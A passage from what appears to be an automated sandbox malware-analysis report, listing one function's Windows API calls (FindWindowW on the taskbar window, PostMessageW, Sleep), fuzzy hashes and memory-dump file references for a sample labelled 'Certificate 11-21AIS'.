                                                                              • Opcode Fuzzy Hash: 03d2588585c21d40f48a36a764d341f8389c9802a51e01d9de0d47a5593eac87
                                                                              • Instruction Fuzzy Hash: E8D0223A399314BBF22463709C0BFC67A089B40F20F000804B34DEA0C0C8E0E900D710
                                                                              Function 009286CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009286E2
                                                                              • PostMessageW.USER32(00000000), ref: 009286E9
                                                                                • Part of subcall function 00907A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00907AD0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 3b8e07df7fc35e77df6083184334bc515935710a4ebf09a947894029663df1ea
                                                                              • Instruction ID: 27a0add5b82846744828b7844cee9b900870b7b2d2dd6709ae709760f9d0ce55
                                                                              • Opcode Fuzzy Hash: 3b8e07df7fc35e77df6083184334bc515935710a4ebf09a947894029663df1ea
                                                                              • Instruction Fuzzy Hash: 91D0123A7DA3147BF26467709C0BFC67A189B45F21F114815B74DEA1D0C9E4F940D754